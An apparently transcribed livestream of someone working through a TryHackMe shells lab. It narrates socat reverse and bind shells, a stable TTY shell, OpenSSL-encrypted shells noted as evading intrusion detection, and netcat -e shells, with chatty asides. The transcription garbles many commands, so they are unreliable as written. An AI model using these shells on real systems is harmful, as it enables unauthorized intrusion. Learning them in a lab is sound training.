Oh my goodness, water in my ear from the shower still. So, write output to a file named as a remote file. But it doesn't say where. Write a file instead. Yeah, so the default is stdout. And both of these changes that. But in the more complicated help, we saw that O could also be, where is it? Here. It could also be output dir, or is this a separate with no short form? That's probably it, right? So this is just a file name, and this is the dir name. So I'm kind of thinking this is like overdoing it. Let's skip it. So this is if we want a special name. This is if we kind of liken it, and I'm assuming that there. So let's go back here, and this is where we're typing this, and here we get the file name with the O. So the question is why they do this for vget. Let's ask ChatGPT here. So the same for vget. And then we get this. And it doesn't use O at all to the current directory with the same name as the server, meaning this is useless, this bit. We don't need this bit. It's much simpler than that. Let's use a simple way. Curl looks kind of more complicated. To DL to current dir. There. And then we can see, you know, it's not always the same directory where you can write things. I'm thinking. Oh my god, I have training ache in these muscles from all the table push-ups yesterday. I think it was 40. That's good. We like training ache here. That's good. Meaning we did something good. So let's continue. So that's it, right? So we just dug into this bit for a bit to make good notes that we can use simply if we forget commands. For the sake of completeness, in a Windows CLI environment, we can the same can be done with PowerShell using either invoke web request or a web request system class, depending on the version of PowerShell installed. But they said this was not useful, right? But sure. Let's not add this to these notes, but make sure that we have invoke web request in our web information notes. So not interesting for the shells, but why not make it note for invoke web request, which is aliased, I believe, like both of the previous ones, but the options are of course not aliased, as well as I know at least. So now we have this here. And it's kind of obvious where the example comes from, but I don't care. It's okay like that. Not digging into that. We will cover the syntax for sending and receiving shells with SOGAT in the upcoming tasks. So, good to have the notes. With any of the above techniques, it's useful to be able to change your terminal TTY size. This is something that your terminal will do automatically when using a regular shell. However, it must be done manually in a reverse or bind shell if you want to use something like a text editor, which overrides everything on screen, like Nano. First, opening another terminal and run stdya. Yeah. Well, this is such a oblivious instruction. whatever. This will give you a large stream of output. Note down the values of rows and columns. Yeah. I'm thinking maybe we should add this to the details of our notes on... I removed the common one. So let's make a new one that's actually called sest dty size. So I can see, like, if I scan this, I can see size here, right? If we just click anything, yeah, it's kind of visible there, right? So on base machine, on my shell, whatever, I will get it even if I don't, but still making these notes for not only me, I guess. So stty, I think I have this in the notes already, but I didn't find it the other day, so let's add it. So read rows and columns info. We don't need the screenshots, it's too obvious. In reverse bind shell. I think it just call everything reverse, right? stty rows. Well, I'm using their syntax here, which is numbers, number, and well, let's stty calls, right? Yeah, number there. So filling in the numbers you got from running the command in your own terminal. This will change the registered width and height of the terminal, thus allowing programs such as text editors. They're really neutral here, right? Which rely on such information being accurate to open, correctly open. Okay, and then they have the questions. Right, so the previous one was on all three ways, and now we're focusing on Socket. Socket is similar to Netcat in some ways, but fundamentally different in many others. The easiest way to think about Socket is as a connector between 2 points. In the interest of this room, this will essentially be by a listening port and the keyboard. However, it could also be a listening port and a file, or indeed 2 listening ports. Okay. All Socket does is provide a link between 2 points. I'm like having memories of like just talking on the terminal in old times, 88 times, with someone. Oh. That's what popped up in my mind in images. Much like the portal gun from the Portal games. Once again, let's start with reverse shells. As mentioned previously, the syntax for Socket gets a lot harder than that of Netcat. Here is the syntax for a basic reverse shell listener in Socket. Socket TCP/L. Oh my god, yeah, I remember this from this. Never used it. Port and then a dash. But we could set things in here. I remember that we can't do, otherwise. As always with Socket, this is taking 2 parts. Let's start getting the notes done here, because we having lots of things to type. So this is how to get the actual file there. Let's do a few obvious line between here and do some examples. And let's give this a header too, and maybe not that much space there. So my fingers doing Control S here, thinking this is important apparently. We have all of these commands, so I'm guessing I will read them and type them, because then I might remember them. As always with Socket, this is taking 2 points, a listening port and standard input, and connecting them together. So let's make a basic note here in our Socket notes that Socket is used to connect 2 points. Well, together is kind of superfluous, but let's be obvious. Together. For example, your keyboard. There, example. Well, and the screen, right? A keyboard, screen, and a remote IP plus port, because it won't just be the port and it won't just be the keyboard. So let's go here. Like the Porygon. So let's not keep how things selected that it's not where I am actually. As mentioned previously, the syntax, basic reverse shell listener. So is TCP listener on port. I guess the dash is the most complicated thing here, right? So basic listener. Let's say port listener, and then we type this command so that I repeat this. Socket TCPL colon and the port, and I think I will understand what that means. And then we have the dash that I do not know what it means, and I hope that they will tell me. As always with Socket, this is taking 2 points, a listening port and standard input, and connecting them together. The resulting shell is unstable, but this will work on either Linux or Windows, and is equivalent to this. So we don't have to add anything in our notes. On a Windows, we could use this command to connect back. So let's type this in the notes. On Windows, so of course Socket, and then it's TCP colon, and this then is the local IP. So let's do local IP, and they're using capitals for some odd reason when they used lowercase just before. So I guess this bit with local. It's kinda... We'll see if I'll keep it. PowerShell.exe. Comma pipes. Yeah, I remember these being more complicated. The pipes option is used to force PowerShell or CMD to use Unix style standard input and output. Pipes. Forces use of Unix style IO. This is, well, let's pop back here. This is equivalent to the for Linux. So if we go back here on Linux, socket TCP. I wonder if this is case sensitive. That would be annoying, and also not annoying. Why would they type it otherwise? A local and they do -IP. Well, I do space and lowercase obviously right now, and local port, keeping this as similar as above, and then exec bash, and me doing the parentheses first and the quotation marks first and everything. That's back from when I was like in the 7th grade in Sweden. I had programming. How old I was, I don't know. Was I like 12? No, probably like 30. No, 12 maybe. Whatever. TCP. So it's kind of in my backbone. And some editor now break me there by adding them, but not all. So TCP, local IP, local port, exec. Well, so far this is kind of logical, right? So nothing strange. And this is to just repeat. These are for reverse shells. As always with Socket, this is taking 2 points, connecting them together. The resulting shell is unstable. But this will work on Linux or Windows and is equivalent to this. To connect to this, we would use these. So what I need to add to my notes is on Windows target and on Linux target, on our machine. Basic port listener on our machine. And this is also then, let's remove one of those and make a reverse shell. Listener on our machine. There. And I misspelled our again. How hard is that to type? When you're not looking, it's hard. So was it 4? So now we're going for the bind shell. Listener on target. Yeah, that's enough. We don't have to say like machine there too. Would be too repetitive, right? There. When I looked at this last time, I didn't have Obsidian, so I was making some kind of notes in Google Docs, probably. Obsidian is great. It is, even though it has its problems too. On a Linux target, we would use the following command. So now we're kind of reversing what we did before. So here we have on our machine, on Windows target, and I'm kind of reversing the direction here of the text to make this obvious. And this is really all that would have been needed here too. And it would have made it easier to understand, I think. And my mind is saying make a YouTube video on this. We'll see. Because then you could talk around it and just have this text. That's the reason. Making it obvious. Whatever. I probably won't do that. On Linux. It starts with Linux now. So, okay, let's go for it. On Linux target. And just typing what's in here. Socket TCP L, and we see the similarity, but we'll have to add the what it's executing to, and it's kind of the same. Socket TCP L port. I'm not pleased with this local. Let's just remove them, because local doesn't say anything about the site even, but it's obvious that it has to connect to our machine, so it should say instead our, or if they would call it like attacker, that might be like attacker and target, you know, attacker not instead of local. That would have been more obvious. But I'm thinking it's obvious enough like this. So it's also the same port as used here, so it's the same port. So port, and this one doesn't say anything else on port in the, and then we have exec and bash li there, and also we could quickly take a look at bash, and I'm not sure if we actually can get help on bash. Yeah, I think it's not good, you know. Bash C help site, bash C help. Let's yeah, this is more on the switches like this. So I'm just going to check, because I assume that I is interactive, right? And Al and I is not in here. They're not in here. So useless. The other one was just C help. And these are just the normal commands, as I assumed. So I guess that Google is the friend we want here. What? Bash li. Apple Music. Let's talk about. Oh. Willis tell us. I just noticed that it's purple. I've looked at this before. I'm just curious what the L is. And usually when I Google like this, it's in the information later in the page, right? Which is good when it is. So look, here we have all of the things. I'm kind of, my back is not very good. No, that's not the problem. I know what the problem is. It's female problems. So it's my lower back, meaning my tummy. I'll just get a... let's see here. And my back is also in pain. So, ibuprofen and paracetamol will fix my tummy and back, hopefully. In like 45 minutes. Oh. This is starting to get easy to break. So I should eat the rest of my breakfast before it's lunchtime. So let's look. We could just Control F -li. Well, 7 mentions, these two are nothing. Here we have the .li. I know that ChatGPT would have been better at this, but I want to look. I want to do Google. And also it could, of course, find the wrong answer. Let's look at this later and let's do it here. So, what does li stand for in bash li? L option. Login shell. When bash is invoked as a login shell, it executes commands from bash profile, bash login, or profile in that order, depending on which exists. Okay. A login shell also inherits environment variables set in whole files. So this is what I was going for. And then I is interactive, as I assumed. So when you use bash li, it launches a bash as a login shell, L, also interactive. So I really take the opportunity to dig into these things that I didn't know. Sometimes we could add them to the notes, of course. So this is more on bash, and I do have bash here. Though this is totally different. No, not really. We have I here too. So let's do I interactive L execute command from So I'm copying this explanation and commands from is kind of and well, this is kind of obvious, right? Well, let's leave it there. So we have a bit more information, and even if we would remember it and it's logical that it's that way, now we know it, and then we might see when else to use it. Maybe the above one wouldn't be damaged by having an L2. Sorry for eating, people. I have to eat. So we looked into this. Let's go back to the notes on okay. And it's no longer just Linux. So it's also Windows. Alright, I misspelled. I got a message. I don't know if I would call that an ad, maybe. I still had the app for the lights up on my phone, so it was not closing itself and being kind of hot. I'm actually finishing the breakfast, just the spread left now. So we can focus. Well, we can type at the same time, right? On Windows Target. Let's make this even more obvious. Listen on Linux Target. Listen on Windows Target. And then we have listen. And then we have connect with. This is easy and obvious. Connect with Linux. So we'll listen with this, we connect with this. We'll listen with this, we connect with that. Leaving no room for misinterpretation, right? I've got tiny pieces of bread all over the place now from breaking this when it's crispy. My tummy's happy. Lots of tiny breadcrumbs. All right. I'm thinking, should I go ask my kid a question? But I can do that after, but he might fall asleep. I'll be right back. I'll actually keep the door open a bit. Because it's kind of warm in here. I like warm, but not too much, you know. Anyway, I have a meeting later at 16, so he might have fallen asleep then. Because he's not slept very well tonight, I think. So that's why I just went and asked him a few things. So that I know what he thinks before the meeting. There, let's see. So, listen on Windows Target. So, we're getting the information from this tracking room here. In case someone new popped in. But rather when I leave, it's the other way around, right? Lowest of the low on viewers right now, it seems. As usual, when I just leave. So TCP, L, still, colon. And it's kind of obvious there with the L that we're listening, right? So the syntax is kind of logical. And we listen on a port, of course. And when we connect, I assume, or what is listening maybe, and then this just has power, shell, comma, pipes. And I guess we can copy the comment from up here about pipes, because it is not easy to remember. Forces the use of Unix style IO. And what it says here is we use a pipe argument to interface between the Unix and Windows ways of handling input and output in a CLI environment. So the previous comment or explanation might have been better. Regardless of the target, we use this command on our attacking machine to connect to the waiting listener. So now they call it attacking machine. I'm not even sure. No, it didn't. There. So we go to the right one. I'm just going to check if yeah, that's running, and is this running? Oh my, I just realized something. When I'm going to type a test message that there's 299 followers. And I have not updated.
Test.
I have not updated the target. It's still 100. It's kind of cool with 300. So one more, we have 300. There. So going back to the TTS, and right, I want to have Obsidian there and OBS here, so all the stuffs are in order, all the things. So if we go to this quickly and go to
anything to like bounce off of.
Oh, that's so annoying. Why does it always start automatically? I'm thinking plugin, right? Maybe that's the way. So what was I going for? Yeah, I think maybe they're actually in the channel, right? The goals, because it's about time to set it, right? The goals. Alright, let's mute this. Because I noticed this, you know, That's what I noticed. And we should change this, right? Well, I don't have to do it now, but it's kind of fun to have almost 300. I remember when I was trying to get 50. Wasn't that long ago? Because I wanted the icons. Anyway, where were we? We were there. So, let's see now. So we use pipes there, and we're going to add this. And I'm curious about the dash here. So I assume it's kind of like use whatever is the default instead of the exit bit. I don't know. It's used here, and we will use it again now. Regardless of the target, we use this command, and then we type the connect, and listen on our machine. I think our machine is better than attacker machine. Connect with our machine. Yeah, because it will always be us, the me in this context that does this, and the command is socket, and then we guess it's TCP, right? And then I guess it's IP and port. Yeah. So they say target, and we just say IP colon port there. And there's that dash that I'm kind of curious about. So let's ask our friend ChatGPT about this. What is in socket that is used to as a placeholder for standard input or standard output? This here is what it means in your command. The hyphen indicates that socket should use standard input or standard output, depending on context, as one end of the connection. Yeah, so this kind of explains more about it than what they did from the page. In place of a file name or device. So we could actually use two different machines or whatever here, right? Because we have two, we need two ones of these. So if we do the previous command, and paste it here, and I assume it can explain it from just this, right? Specified port, execute partial instance with bidirectional pipes connected to the TCP socket. Breaking it down, this part of the command instructs socket to listen L for incoming TCP connection on the specified port. And this is the interesting part then. This specifies that each incoming connection socket should execute PowerShell and connect its input and output with the bidirectional pipes mechanism. Yeah, that's nice. So, if specifics, I'm not going to ask it to do coding, you know, because I got tired of getting bad stuff. and spending more time on trying to explain that it was actually doing errors than actually it would have taken me to just do it by Googling. So, but is this kind of good for this? So, in here, I'm thinking like after dash stands represents no. So it's simply stdio. That's enough for me. But maybe not for everybody. Is that good enough? I think I did like before here. Keyboard screen. Could do that. With this explanation, this makes sense for everybody, right? So let's continue looking at the page. What is the next thing? We have read and understood all of this. Now, let's take a look at one of the more powerful uses for SOCAT, a fully stable Linux TTY reverse shell. This will only work when the target is Linux, but is significantly more stable. As mentioned earlier, SOCAT is an incredibly versatile tool. However, the following technique is perhaps one of its most useful applications. Here is the new listener syntax. So, I'm going to do a new section and type more advanced listener for Linux there, and so this is not really examples, this is how it works. Shells. And we could just use this as another header here without the dashes. So, I know there's a difference in the size of the headers. Kinda intentional. So the syntax, the difference here being file. Let's break this command down into two parts. As usual, we're connecting 2 points together. This bit and this bit. In this case, we choose those points are a listening port and a file. Specifically, we're passing in the current TTY as a file and setting the echo to be 0. This is approximately equivalent to using the Ctrl-C roll-echo trick with a netcat shell, with the added bonus of being immediately stable and hooking into a full TTY. The first listener can be connected to with any payload, however. This special listener must be activated with a very specific SOCAT command. This means that the target must have SOCAT installed. So our first note is requires SOCAT on both machines, and I misspelled there. So maybe we should add to this one. Can be used for like. Let's do the NC1 LVNP. Well, I usually do. Let's do port then instead. No, right. This broke all of the syntax because we don't have these there. It broke the markdown. That's why I have to use these when I use these, because it breaks. I guess it's because you can use like BR and such things. Listen on our machine. It can be used like. And not just for socket connections. I guess we'll have to actually use this for it to stay in the brain, you know. So, listener. And another line there. Socket TCP/L just as usual, and colon port as usual. Then we have the new stuff. Instead of a dash, we have file. And I think it's actually using the same quotation marks in this example there. So we have a special characters in Markdown, meaning we will do the normal ones. TDY, and I'm actually fighting myself for quicking typing here. So why it uses no spaces, I don't know. It might need no spaces. So I'm not changing that until we know. So there. So I got TCP/L port file TTY roll echo 0. So kind of doing. Let's add the comment here. Sets echo off. Is much more stable and sets echo off. So the first listener can be connected to with any payload. However, this special listener must be activated with a very specific socket command. This means that the target must have socket installed. Most machines do not have socket installed by default. However, it's possible to upload a precompiled socket binary. That's the one we have the link to, which then can be executed as normal. This means we have to download a file, which is like, why? Special case, I guess. The special command is as follows, and I'm going to type this, and I might start reading here. We'll see. Well, let's read it first. The first part is easy. We're linking up with the listener running on our machine. IP port. The second part of the command create an interactive bash session with exec bash li. We also parsing arguments pty, stdr, sigint, setsid, and sane, and they mean allocates a pseudo terminal on the target, part of the stabilization process. stdr makes sure that any error message gets shown in the shell. This is often a problem with non-interactive shells. Sigint passes any Ctrl-C commands through into the subprocess, allowing us to kill commands inside the shell. Setsid creates a process in a new session. The logic here is not obvious to me. Sane stabilizes the terminal, attempting to normalize it. Trying to make it sane. Well, let's type this command so we don't run too far ahead. So, let's call it connection. Connector. Connection. Command. Well, connection. That's good enough. For now, we have explained how it works before, Will they connect with, listen with, to stuff. SOCAT. But then again, why not? Why not? Why not? In case we just read this, why not be thorough and use this basic thing? And this is only Linux, so we get this here automatically. Connect with Linux target. So I stopped in the middle of the command there. SOCAT TCP colon Gigaban IP colon port and then we do exec colon and bash li comma pty allocates a pseudo terminal on the target as part of the stabilization process. stdr to make sure that we get the error messages. Sigint to add sending on of Ctrl-C. Setsid. Which makes me think I should send this to ChatGPT too to get a different explanation than creates the process in a new session. It might just be a crazy naming and that's it, but we never know. You never know. People can, have bad explanation and can have actually also SOCAT command provided. So this option sets the ID of the executed command to isolate it from the terminal session. Yeah, because this is much more better explanation that it might not be correct since this is ChatGPT, you never know. But this is how I would understand it. It's calling set SID, you know, it's not setting. It's not called like it's not create process. So set a terminal for interacting with terminal oriented. Direct STTR. SIGINT, Control C signal. Exactly as the other one. And the sane, set sane mode. Adjust some parameter for more predictive behavior. So that's what it does. So this one sets the session ID there. I'm not sure if I will include this, because we can always look this up again, you know. So we don't have to have all of the explanation in here. We have more advanced listener for Linux. It requires socket on both machines, and the listener and the connect with Linux. I think that's kind of enough. It's normal. On the left, we have a listener running on our local machine. On the right, we have a simulation of a compromised target running a non-interactive shell. Using the non-interactive netcat shell, we execute the special socket command and receive a fully interactive bash shell on the socket listener. There, so who am I shell? Is it shells? Shell at localhost. And first it did this. Socket TCPL 53 file. Yeah, so this is the listener, and this is the first connect, and they're showing that it's interactive by using SSH. Because I'm like, SSH, why? But this just to show the interactivity. So from running the RL wrap NC, they run this. But here I was almost assuming a download, but they didn't do it there. Note that the socket shell is fully interactive, allowing us to interact to use interactive commands such as SSH. This can then be further improved by setting STTY values as seen in the previous task, like the size, which will let us use text editors. And they don't say set rows and columns. They set, again, point up to the previous tasks. And we can't just scroll up, we have to click, we have to scroll lots, or whatever, you know. If at any point a socket shell is not working correctly, it's well worth increasing the verbosity by adding DD to the command. This is very useful for experimental purposes, but it's not usually necessary for general use. So DD, I guess that's D for both sides then. DD, yeah. Oh. The more complicated things are coming. We're not done with socket yet. I guess this is the real purpose. But the DD, we have to add this somehow. Debugging, right? So you can add dd to a socket command to increase verbosity, but I guess it's debug there. So let's go to encrypted. It's not very long, this one either. I remember them as being very long. But I had never used Netget then, even. Almost. Oh, I remember that one of these commands, where maybe it was this one, was kind of complicated. Maybe it was this one. Now we have to read and learn. And I still have like an hour. Aiming at 12 there. My time, of course. That's on screen. Sorry. Allergy stuff. I'm guessing it's better weather today, more pollen and stuff. One of the many great things about Socket is that it's capable of creating encrypted shells, both bind and reverse. Why would we want to do this? Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IDS. As a result, intrusion detection system. We covered how to create shells in the previous task, so that syntax will not be covered again here. Suffice to say that TCP was used as a part of a command. This should be replaced with OpenSSL when working with encrypted shells. We cover a few examples at the end of the task, but let's first talk about certificates. So I'm thinking let's first add a header. And I'm doing 4 here. Encrypted shells. 4. No. Let's look here. The shells one is just 2. That's what I was going for. So don't ask me why. There. I just have a lot of slime in my throat. I could just take some. This is kind of out though. I'm going outside soon. Driving my kid to school. So let's see. Yeah, let's hop back here and read. We first need to generate a certificate in order to use encrypted shells. This is easy to do on our attacking machine. OpenSSL rec new key RSA 2048 nodes key out shell key x59 days 362 out shell CRT. Well, I just read it to have read it. This command creates a 2048-bit RSA key with a matching cert key, some nodes. Let's see if there's anything on that. Key out shell key. Matching cert file, self-signed, and valid for just a year. So that's the days, I guess. When you run this command, it will ask you to fill in information about the certificates. This can be left blank or filled randomly. We then need to merge the two created files into a single PEM file, the shell key and shell cert. Now we set up a reverse shell listener. But they skipped a lot, you know, it didn't explain it all. So since we have ChatGPT up and waiting for some work to do, we'll just let's pop this one over here. So let's just, if we paste it,
VR
it will
Mechatronics says.
do the next one.
Hello fix. Hello viewers.
Hi, VR Mechatronics, welcome back. Welcome back. We're looking into currently actually OpenSSL. So we are asking ChatGPT to explain all the options, since TryHackMe just continues after saying it creates this and not explaining it. So we want to know all the information, right? First we need to generate a certificate. So let's start by adding this to our information here. So generate certificate. So this is step 1 to be able to use encrypted shells with SOCAT. And let's read about it. Wait, let's type this first into. Actually, this is not. I don't feel that I will need to kind of know this one by myself. So let's copy and paste. Copy and paste this one, and let's paste it inside there. So we have the command. Now we want the explanation in detail. And the command you have provided is used to generate a safe-signed SSL certificate, called this, along with corresponding private key, using OpenSSL. And here's the breakdown. Rec. This involves the... Oh, right. Don't forget to do TryHackMe. It's 11 o'clock. And that's why it keeps reminding me. So, this invokes the OpenSSL utility for generating a certificate signing request. So, OpenSSL rec is the base command we're using. OpenSSL has other parts that we're not using right now. Good. So, I'm thinking let's do this at once. So rec this might be not anything everybody wants to know, but I do, so request certificate, right? We don't need more than that. Then we have the new key, RSA, and I'm going to copy this and remove what I don't want. So, because this is quicker. This bit I want in there, but then we want just a space. Generates RSA key. There, generates a 2048 that the output will be included. Private key will be included in the output. Private key. Well, that's too obvious. Too obvious. Then we have the nodes that was not mentioned at all. Specify that the private key should not be encrypted with a passphrase. Using this option means that the private key is saved in plain text. So this is the interesting part here. So let's add this to the notes. And I think it's easier to just type. So dash nodes. So save private key as plain text. Key out shell key. This specifies the file name of the private key. So let's type this. Key out. Now we're taking the opportunity to learn about OpenSSL. So key out shell.key. Well, the name is not important, of course. So key file name. This is kind of obvious, but still, let's do all of them when we're doing this money anyway. And this is kind of, hard to understand by itself. This option indicates that a self-signing certificate should be generated rather than a certificate signing request, CSR. So that is definitely not anything I would have guessed. Not that I would have guessed anything about this. X509 doesn't tell me anything. Should I do generate again? Generate self. They're doing dash, so let's do that. Delve signed. I'm tired of typing certificate all the time. Just some asthma slime wanting to be out of my body. So days is kind of obvious. So the number of dashes though we have to do, because the new key was 2 dashes and the others have been 1, though they have not been like 1 letter ones. So days 362, whatever. Validity period. Well, set cert validity. Validity to 362 days. So, and then we have out shell CRT. This specifies the file name of the self-signed certificate. Well, I didn't really read that, but already thinking of what to type. So out. So we have the key out and the out. And maybe we should just reposition these. I don't think the order matters, right? Why do this order?
Fixerbot says. New follower SNK 158. Less than 3.
Welcome in, SNK 158. Welcome in. We're learning SOCAT, and currently we're generating a certificate with OpenSSL. So, take the opportunity to learn here. And make notes so we don't forget. And we can repeat. Yeah, certificate. But first, shell dot CRT. Trying to be 3 letters here. Why? Why? Cert file name. There. And key file name. Yeah, it was logical there. Let's add an there, because it's more like readable. So rec is request a certificate. New key RSA 2048. It's we don't need a generate, right? This should be a nah, let's keep it there. Generate instead of generates is better. That's what I was annoyed at, I think. So node save private key as plain text. Key file name. Generate self-signed cert. Set cert validity. And this is the rest is for knowing it's days, but it's called days. So okay, that's enough. We don't type the file name here either. Set cert validity, cert file name. So now we know exactly what this is doing. Now that we know how to change it, we can change the days, you know, but what other X509 what's the alternative to that? I guess nothing, which would make it a, as it said here, certificate signing request CSR. So this is just more on the same. For production use, it's recommended to obtain certificates signed by a trusted certificate authority. There. So going back to the room, we have read this. What we need to do now is to merge these two files. So let's put this in the notes as the next step. Merge the key and the cert. And this is very simple, right? You know, we just cat shell dot key shell dot crt, and so now we know the definition of what a PEM is, right? To shell dot PEM. So we learned more things here. Now we can actually set up our listener. And of course we use the cert file here. Verify 0 tells the connection not to bother trying to validate our certificate as being okay. So it's not signed by a recognized authority, obviously. So yeah, let's add this to the notes too, so we have all of the This is actually used, that's just a setup. So to actually use a bit of copy paste. I'm trying to page down here. Saving a tiny bit of time and keeping it consistent, mostly keeping it consistent, so that it's easy to read. So the command is socat, obviously, and then we have the open SSL and listen. Now it's not L, it's listen. I wonder if both works. I guess so. Colon, and then we have our port, and yeah, because this is a part of the listening. Now we make commas to adding information here. So shell.pem verify 0. Oh, so OpenSSL listen port search shell pem verify 0, and then we need the other side, which is just a stdio here, there. This is up, verify 0, tells the connection. Yeah, I think we want this in our note, in the notes, and I'm going to copy this and let's edit it, because we don't want this long text. Let's just so don't validate assert has been signed by authority. Oh well, let's keep that there. Don't validate cert has been signed by recognized authority. And the rest is very obvious, right? And I totally messed up because it's supposed to be there. Why did I move? The rest is obvious, and that's when I noticed I was in the wrong place. So, to connect back, we would use this. And on the bind shell one, now we're using CMD here too. So, let's continue the notes. And tell me if I like put stuff under the camera or something. So, socket, open SSL, and no listen this time, and I'm curious if -L works, because who when they type more than they have to. Part, yeah, of course, we need the IP too. And then comma the verify 0. We don't add this comment again because it's just a line above. Am I actually... No, I'm typing the wrong line. It was like, no, why would we have this? Wrong line. No, it's actually there. It's actually there. So, the reason I'm confused is, you know, the lines are kind of similar. But this is this one, and we have verify 0 here too. And I'm typing it to make it easier to remember and understand and find things we need to search more information on. So exec, bin, bash. There. So we connect bin bash to this connection. Let's compare this to the normal one. Let's copy this line. And for normal reverse shell, connecting with is this one. So why have they skipped the li bit? That's kind of what I'm thinking, in doing bin bash instead of bash li. Because this really doesn't have anything to do. This is our side. Is it by default interactive, you know, and gets the files? We'll see if we read more, right? Or is this not a good example? Or did they assume we would just add this ourselves? So the same technique would apply for a bind shell, just the other way around then. So let's again add an actual header here. So let's use these long explanatory ones. So this is actually its own header almost. Let's do create certificate as a header on, is it 4 level, right? I want a new line there. No, I don't. That was too much. That's very interesting. Why so much extra space? Whatever. That's okay. So we have reverse shell. And then we have, let's copy the other header too. So we have symbol, logical structure. So it's easier to remember and find the information again. So here, the target and attacker. And I'm kinda tempted not to type, but let's type. We have 40 minutes more. Hopefully we'll at least get back to where I was a few months ago. And not this thoroughly that time. Just trying to understand the basics then. Not digging deep. So, SOCAT. Open SLL colon. Right. So let's copy these kind of useful ones. And now we kind of, it's CMD, so I'm copying this one, and I'm actually going to copy this one too, just for comparison. and pasting it here, and the other one is it's 2 pages down now, and we have this one, which is a new one, and just to compare it with the old one, we have it side by side. So port and comma cert equals shell.pem, I'm sure it is, yeah, comma verify 0, and then we have exec, and this time it's cmd. So they're changing stuff up, and as this is a noob room, I wouldn't do that when teaching someone something for the first time, you know. Now it's interesting to me. Then I was like, what on earth is this? What? I've never heard of this. I've never heard of this, you know? So now we can recognize that we're doing something different here. And yeah, I was thinking there must be a less in here too. And not right. It's supposed to be less and there. So we can see the difference easily. Now let's remove the normal one. And we have explanations just above here for these. And the pipes is above there. Oh, maybe I should have them, you know, because it's kind of high up. So, and I'm not thinking we'll have to read all of this to understand. I'm thinking it's supposed to be easy. So, let's explain them here once. Not here again, but once. So, socket, open SLL, colon, IP, port, and then comma verify equals 0, and then that's a dash. So we're listening. So we don't verify the certificate or anything. Let's continue, because I'm kind of curious. The certificate, you're not sending it, right? Or are you? I'm lacking part of the information. Again, note that even for a Windows target, the certificate must be used with the listener. So copying the PEM file across for a bind shell is required. Yeah, that's what I thought. We would need it. But it's here. So we need to copy both SOCAT and the certificate. Well, bind shells are looking less and less attractive, right? Again, note that even for a Windows target, the certificate must be used with the listener. So copying the PEM file across is required. Yes. Just to repeat it again. The following image shows an open SSL reverse shell from a Linux target. As usual, the target is on the right and the attacker is on the left. Okay, target on the right. Why don't they say left and then right? Because I got confused. What, we usually have the attacker first, and then yeah, that's what they're saying. Sorry. Can you edit these runes? Just make these tiny changes for it to be easier to people to actually see. And these could be dark mode. They could be dark mode. Open SLL rec. 3 hours and 45 minutes, and we have 30 minutes to go. Key RC, node encrypt. Yeah, so we first do that. Writing key to encrypt key. Yeah, it said it will be asking us for information. And then we cat the keys together. I would like to select text, but it's not possible, you know. It's an image. Sodo socket. Yeah, so we're running it. Listen, starting the listener here on port 53, using the encrypt.pem certificate and telling it don't verify this thing. And then listener. This is the horrible thing. They said before that they will be using an alias. And why on earth would they be doing that, you know? Why not show again and again stuff? Anyway, we have it here. Socket, open SL, IP colon port, verify 0, exec bin bash. And then we have who am I, www data, ID, and they do IPA. And I'm scrolling in the background. There. Now this technique will also work with a special Linux-only TTY shell covered in the previous task. Figure out the syntax for this will be the challenge for this task. Feel free to use the Linux practice box to experiment. There was a lot of characters filled in, you know, so I kind of just added the information we had with what we had. Added the information together. I'm still confused by its being called listen instead for just -l. Why? More characters to type. We'll have to try if L works. I would kinda assume it does. If it doesn't, that's bad. Oh. So, let's go to the notes and look at the special thing they mentioned here. More advanced listener for Linux. Maybe we should simply move this below the encrypted ones. And let's make it level 2 instead. And let's add encryption with encryption, and this is a level 4 one. So we can add these to just copy paste these to make it easy and obvious, and listen on our machine. Then I made these commands months and months and months ago, at least 6 months, because I haven't been doing try hack me learning thingies. But now I want to finish it. So this is the command for the listener. And I'm actually shading and copy pasting. Yeah, I'm using their syntax. That's the only way, you know. So unfortunately, it wouldn't work really with those, right? But the answer has to be right. It has to use the characters. So cat, open SSL lesson 53 cert encrypt PEM, and this is what they told us that the file would be. So let's instead use the same name, shell, right? So it's supposed to be shell.pem, and then we have verify 0, and then we have file tty raw equals 0. And now we can more easily compare to this one, where we have the same file, file bit there. So let's copy the other one, the special one here. So we have OpenSSL IP, and this is their example IP, so you have to use it. But we have been using port and IP, so let's continue doing that in the examples. So IP, port, verify, and then comparing with the one above here. Right, how would you use to connect back to the listener? So here we have exec bash li pty, and the same thing on the right side. The difference is only this. So yeah, right, that's for my kids. Preparing my kids for a meeting, or rather to drive there. It's the hard bit for him. So I decided to put a car instead of a meeting image. So we're done with this. We still haven't done any practical things. We are going to do it down here. I feel that I have got a much better grip on this than we did when I did one before repeating it. So let's look at the last one, but also I'm thinking in 25 minutes I'll have to make food for the kids. At least depending on, I can just do a break also, but I would need, what else do I need to do? I'm thinking I'll do like a quick 5-minute food making probably. Which it takes to make pizza from finished dough. Put it in the oven, and then my kids, the one who wants the pizza, will eat it, get it himself. The sardine. Oh my god. In 2 months and 2 days he'll be 40. Crazy how the time just flies away. So let's read this. Common shell payloads. We'll soon be looking at generating a payload with MSF Venom. But before we do that, let's take a look at some common payloads using the tools we've already covered. A previous task mentioned that we'd be looking at some ways to use Netcat as a listener for a bind shell, so we'll start with that. In some version of Netcat, including in c.exe Windows version, included with Kali at. This is interesting information, so let's copy this and go to our notes, and in here let's add this. I don't have any information here really. So nc.exe available on Kali at there. So that's kind of nice to have there too. Not as organized notes as the one we were making here, right? And the version used in Kali itself, Netcat traditional. In some versions, okay. So there is an E option which allows you to execute a process on connection. For example, as a listener, nc lvnp port e bin bash. Connecting to the above listener with Netcat will result in a bind shell on the target. Yeah. Equally, for a reverse shell, connecting back with nc IP port e bin bash will result in a reverse shell on the target. However, this is not included in most versions of Netcat, as it's widely seen as to be very insecure. Funny that on Windows, where static binary is generally always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell. Okay, I'm feeling my throat is kind of going here, so I'm thinking instead of streaming for well, like a few minutes more, trying to take a break, and this, I just got a sore throat, and I'm feeling that I want to dig into this with more time than we probably have, because this is a whole new thing to look up, because I'm not used, I recognize it, but I haven't used MKFIFO, and I want to look at it thoroughly. So I'm actually thinking I'll be raiding quicker rather than later.